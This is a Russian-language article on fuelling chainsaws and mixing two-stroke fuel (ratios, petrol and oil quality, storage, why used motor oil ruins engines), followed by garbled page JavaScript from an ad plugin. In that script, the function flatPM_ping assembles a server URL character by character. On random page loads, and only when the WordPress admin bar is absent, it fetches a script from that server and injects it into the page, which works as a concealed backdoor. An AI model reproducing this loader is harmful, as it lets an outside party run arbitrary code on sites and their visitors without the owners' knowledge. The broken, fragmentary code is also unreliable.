  5. Осторожно залить топливо в бачок, не допуская перелива. Заливать под крышку недопустимо — это приведет к выплескиванию во время завинчивания крышки!
  6. Закрыть крышкой топливный бачок
  7. Заменить смазку для цепи (обязательно!)
  8. Пробно запустить мотор на холостых оборотах.

Что будет если залить отработку в бензопилу

Когда владелец бензопилы некоторое время попользуется ею, он может захотеть провести некоторую модификацию инструмента. И хорошо если его желания ограничатся покупкой различных насадок, расширяющих функционал бензопилы. Но некоторые идут дальше — они начинают экспериментировать с бензином и маслом, на которых их пила работает.

Если о бензине мы уже говорили ранее (большинство современных пил требуют его с высоким октановым числом — не ниже 92-95), то о масле стоит сказать особо. У многих автолюбителей в процессе эксплуатации автомобиля накапливается значительное количество использованного машинного масла. И поэтому у некоторых возникает желание использовать этот материал для заправки бензопилы.

Если так поступить, то гарантированно произойдет выход из строя двигателя. Причиной этого будет прежде всего низкая смазывающая способность повторно используемого масла. Оно будет гореть с большим выделением черной копоти. Содержащиеся в масле частицы металла сначала забьют топливный фильтр (это те частицы, которые более крупные), а потом — выйдут из строя уплотнительные кольца цилиндра. Металлическая взвесь в масле повредит и поверхность самих цилиндров и подшипники.

Некоторые «рационализаторы» пробуют использовать отработку для смазывания самой цепи и колодки, на которой она располагается. Это так же ни к чему хорошему не приведет. Что именно произойдет — можно увидеть на прилагаемом видео.

Двухтактная смесь. Как смешивать?

Первое: соблюдайте инструкцию

Главное правило при составлении топливной смеси – это соблюдение инструкции по эксплуатации к вашему агрегату. В каждой инструкции к инструменту, оборудованному двухтактным двигателем есть раздел, посвященный приготовлению топливной смеси. Старайтесь неукоснительно соблюдать требования, изложенные в этом разделе, даже если они расходятся с нашими рекомендациями. Ведь именно производитель техники, написавший инструкцию, предоставляет гарантийные обязательства и несет свою долю ответственности.

Второе: используйте качественный бензин

Двухтактные двигатели вследствие небольшого объема и особенностей смазки, очень чувствительны к качеству смеси, ее октановому числу, присутствию примесей и присадок. Для приготовления топливной смеси используйте чистый, свежий, неэтилированный бензин с октановым числом не ниже 92. Заправляйтесь на проверенных заправках, не используйте бензин, долго хранившийся в канистрах, проверяйте его прозрачность, отсутствие осадка. Помните что у бензина при хранении снижается октановое число, и он становится непригодным для составления двухтактной смеси.

Третье: используйте качественное масло

Используйте двухтактное масло, рекомендованное в инструкции по эксплуатации или его полный аналог. Двухтактные ДВС, установленные на садовой технике имеют воздушное охлаждение и отличаются от лодочных и мотоциклетных двигателей температурным режимом, юи развиваемыми оборотами двигателя. Поэтому двухтактное масло для садовой техники, бензопил, бензокос отличается от масла для лодочных моторов и мотоциклов. Также важно знать, что двухтактные масла часто подделывают, поэтому старайтесь приобретать масло только в дилерских центрах. Двухтактное масло в закрытой таре и в обычных условиях может храниться годы, точный срок хранения указан на упаковке.

Четвертое: смешивайте и храните в специальных емкостях

Для того, чтобы смесь оставалась качественной очень важно хранить смесь в специальных емкостях. Это связано с тем, что не все виды пластиков инертны к топливу. Бензин или присадки, присутствующие в его составе, могут частично растворять материал емкости и затем оседать на топливном фильтре и деталях карбюратора. Вторая опасность – статическое электричество, которое может воспламенить пары бензина при заправке. Именно поэтому на АЗС не заливают бензин в непрофильные емкости. Используйте специальные канистры и емкости для смешивания, а также шприц или мерный стаканчик для дозировки масла.

Пятое: соблюдайте пропорции

Пропорции смеси бензина с маслом могут отличаться в зависимости от модели двигателя, маркировки масла и рекомендаций производителя. Тут лучше еще раз вернуться к руководству по эксплуатации, в которой указаны правильный пропорции для вашего агрегата. Наиболее часто встречается пропорция 1:50. Это означает, что одну часть масла нужно смешать с 50-ю частями бензина. Чтобы узнать сколько нужно масла для 1 литра бензина решаем задачу по математике для начальной школы: умножаем обе части на 20 и получаем 20:1000. Ответ: на 20 мл масла нужно взять 1 л (1000 мл) бензина. Но могут встречаться и другие пропорции, рекомендованные производителем – 1:40 1:33 1:25. В этих пропорциях доля масла возрастает.

Шестое: хранение топливной смеси

Приготовленную двухтактную топливную смесь нельзя хранить долго. Она постепенно теряет свои свойства. Старая смесь может привести к поломке двухтактного двигателя, как и чистый бензин. На хранение влияют такие факторы, как состав, температура, солнечный свет, влажность, поэтому точных данных о сроках хранения нет. Составляйте столько смеси, сколько вы используете в течение 1-2 недель. А если она хранилась больше месяца, ее уже можно считать старой и непригодной. Некоторые используют старую полугодовалую смесь без последствий, а иногда это приводит к серьезной поломке. Помните, что современные двухтактные двигатели бензопил и бензокос работают на высоких оборотах и очень требовательны к качеству и составу смеси. Возможно, по каким либо причинам вы все же решите рискнуть и использовать старую смесь, тогда желательно добавить в нее немного двухтактного масла. В этом случае пропорция будет неточная, возможно с избытком масла, но это лучше чем его недостаток.

Седьмое: последствия применения некачественной смеси

Надеюсь, что до этого не дойдет, но представления о последствиях иметь нужно. Двухтактные двигатели работают на бензино-масляной смеси. Чистый бензин, недостаток масла и его избыток приводят к неисправностям и дорогостоящему ремонту. Масло в смеси выполняет функцию смазки всех трущихся деталей двигателя, а в процессе работы сгорает вместе с бензином и удаляется через глушитель.

При работе с недостатком масла нарушается процесс смазки, возрастают обороты и растет рабочая температура. В результате на поршне и цилиндре образуются царапины и задиры сначала со стороны глушителя, а затем они распространяются на всю рабочую поверхность. Иногда происходит заклинивание подшипников, поломка шатуна, поршневых колец с дальнейшим повреждением деталей двигателя.

Избыток масла также вреден для двигателя. Сгоревшее масло должно сгорать и удаляться с выхлопом, но при его избытке этого не происходит. Масло оседает в виде нагара на кольцах, свече, поршне и в глушителе. Кольцо может забиться нагаром, в результате чего нарушиться компрессия и двигатель остановиться. Нагар при работе повреждает поверхности цилиндра и поршня. К остановке двигателя может привести забитый нагаром глушитель. Если произошло что-либо подобное, рекомендуем обратиться за помощью в наш сервисный центр.

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()};var parseHTML=function(){var o=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,n,r,l=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=l.appendChild(t.createElement("div")),n=(d.exec(e)||["",""])[1].toLowerCase(),n=c[n]||c._default,a.innerHTML=n[1]+e.replace(o,"$2>")+n[2],r=n[0];r--;)a=a.lastChild;for(l.removeChild(l.firstChild);a.firstChild;)l.appendChild(a.firstChild)}else l.appendChild(t.createTextNode(e));return l}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,n=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)n.appendChild(a),ff(n).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var l=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",n=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,r='
'+a+" через "+o+'
'+n+'
',i=e.once;l(t).each(function(){var e=l(this);e.wrap('
');var t=e.closest(".flat__4_video");-1!==r.indexOf("go"+"oglesyndication")?t.append(r):flatPM_setHTML(t[0],r),e.find(".flat__4_video_flex").one("click",function(){l(this).addClass("show")})}),l("body").on("click",".flat__4_video_item_hover",function(){var e=l(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),n=parseInt(o),r=setInterval(function(){a.text(--n),n'):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){l(this).closest(".flat__4_video_flex").remove(),"true"==i&&l(".flat__4_video_flex").remove()})};
Яндекс.Метрика